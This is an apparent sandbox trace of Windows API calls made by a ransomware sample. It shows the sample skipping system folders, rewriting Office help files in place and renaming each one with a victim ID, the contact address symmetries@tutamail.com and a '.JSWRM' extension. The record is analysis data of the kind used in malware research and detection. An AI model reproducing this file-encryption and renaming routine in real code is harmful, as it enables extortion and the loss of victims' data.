[0113.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL.HXS", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL.HXS", lpUsedDefaultChar=0x0) returned 9 [0113.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0113.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0113.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0113.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0113.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.849] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1523112) returned 1 [0113.849] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.849] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.863] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.863] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.864] CloseHandle (hObject=0x238) returned 1 [0113.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0113.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0113.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0113.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0113.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0113.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.865] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0113.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0113.866] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a05f3c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a05f3c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a05f3c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26d, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="EXCEL_COL.HXC", cAlternateFileName="EXCEL_~1.HXC")) returned 1 [0113.866] lstrcmpiW (lpString1="EXCEL_COL.HXC", lpString2=".") returned 1 [0113.866] lstrcmpiW (lpString1="EXCEL_COL.HXC", lpString2="..") returned 1 [0113.866] lstrcmpiW (lpString1="EXCEL_COL.HXC", lpString2="...") returned 1 [0113.866] lstrcmpiW (lpString1="EXCEL_COL.HXC", lpString2="windows") returned -1 [0113.866] lstrcmpiW (lpString1="EXCEL_COL.HXC", lpString2="recovery") returned -1 [0113.866] lstrcmpiW (lpString1="EXCEL_COL.HXC", lpString2="perflogs") returned -1 [0113.866] lstrcmpiW (lpString1="EXCEL_COL.HXC", lpString2="documents and settings") returned 1 [0113.866] lstrcmpiW (lpString1="EXCEL_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0113.866] lstrcmpiW (lpString1="EXCEL_COL.HXC", lpString2="system volume information") returned -1 [0113.866] lstrcmpiW (lpString1="EXCEL_COL.HXC", lpString2="msocache") returned -1 [0113.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0113.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_COL.HXC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_COL.HXC", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL_COL.HXC", lpUsedDefaultChar=0x0) returned 13 [0113.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0113.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0113.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_COL.HXC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_COL.HXC", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL_COL.HXC", lpUsedDefaultChar=0x0) returned 13 [0113.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0113.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0113.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0113.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0113.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.875] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=621) returned 1 [0113.875] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x260) returned 0x20b1f8 [0113.875] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x260, lpOverlapped=0x0) returned 1 [0113.876] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.877] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x260, lpOverlapped=0x0) returned 1 [0113.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0113.877] CloseHandle (hObject=0x238) returned 1 [0113.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0113.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0113.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0113.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0113.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0113.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.877] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0113.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0113.878] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a05f3c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a05f3c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a05f3c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcd, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="EXCEL_COL.HXT", cAlternateFileName="EXCEL_~1.HXT")) returned 1 [0113.878] lstrcmpiW (lpString1="EXCEL_COL.HXT", lpString2=".") returned 1 [0113.878] lstrcmpiW (lpString1="EXCEL_COL.HXT", lpString2="..") returned 1 [0113.878] lstrcmpiW (lpString1="EXCEL_COL.HXT", lpString2="...") returned 1 [0113.878] lstrcmpiW (lpString1="EXCEL_COL.HXT", lpString2="windows") returned -1 [0113.878] lstrcmpiW (lpString1="EXCEL_COL.HXT", lpString2="recovery") returned -1 [0113.878] lstrcmpiW (lpString1="EXCEL_COL.HXT", lpString2="perflogs") returned -1 [0113.878] lstrcmpiW (lpString1="EXCEL_COL.HXT", lpString2="documents and settings") returned 1 [0113.878] lstrcmpiW (lpString1="EXCEL_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0113.878] lstrcmpiW (lpString1="EXCEL_COL.HXT", lpString2="system volume information") returned -1 [0113.878] lstrcmpiW (lpString1="EXCEL_COL.HXT", lpString2="msocache") returned -1 [0113.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0113.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_COL.HXT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_COL.HXT", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL_COL.HXT", lpUsedDefaultChar=0x0) returned 13 [0113.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0113.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0113.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_COL.HXT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_COL.HXT", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL_COL.HXT", lpUsedDefaultChar=0x0) returned 13 [0113.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0113.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0113.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0113.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0113.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.879] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=205) returned 1 [0113.879] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0113.879] ReadFile (in: hFile=0x238, lpBuffer=0x24be70, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24be70*, lpNumberOfBytesRead=0x345e89c*=0xc0, lpOverlapped=0x0) returned 1 [0113.880] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.880] WriteFile (in: hFile=0x238, lpBuffer=0x24be70*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24be70*, lpNumberOfBytesWritten=0x345e898*=0xc0, lpOverlapped=0x0) returned 1 [0113.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0113.881] CloseHandle (hObject=0x238) returned 1 [0113.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0113.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0113.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0113.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0113.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0113.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.881] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0113.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0113.882] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a05f3c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a05f3c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a05f3c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="EXCEL_F_COL.HXK", cAlternateFileName="EXCEL_~1.HXK")) returned 1 [0113.882] lstrcmpiW (lpString1="EXCEL_F_COL.HXK", lpString2=".") returned 1 [0113.882] lstrcmpiW (lpString1="EXCEL_F_COL.HXK", lpString2="..") returned 1 [0113.882] lstrcmpiW (lpString1="EXCEL_F_COL.HXK", lpString2="...") returned 1 [0113.882] lstrcmpiW (lpString1="EXCEL_F_COL.HXK", lpString2="windows") returned -1 [0113.882] lstrcmpiW (lpString1="EXCEL_F_COL.HXK", lpString2="recovery") returned -1 [0113.882] lstrcmpiW (lpString1="EXCEL_F_COL.HXK", lpString2="perflogs") returned -1 [0113.882] lstrcmpiW (lpString1="EXCEL_F_COL.HXK", lpString2="documents and settings") returned 1 [0113.882] lstrcmpiW (lpString1="EXCEL_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0113.882] lstrcmpiW (lpString1="EXCEL_F_COL.HXK", lpString2="system volume information") returned -1 [0113.882] lstrcmpiW (lpString1="EXCEL_F_COL.HXK", lpString2="msocache") returned -1 [0113.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0113.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0113.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL_F_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0113.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0113.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0113.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0113.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL_F_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0113.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0113.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0113.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0113.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0113.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_F_COL.HXK" (normalized: "c:\\program files\\microsoft 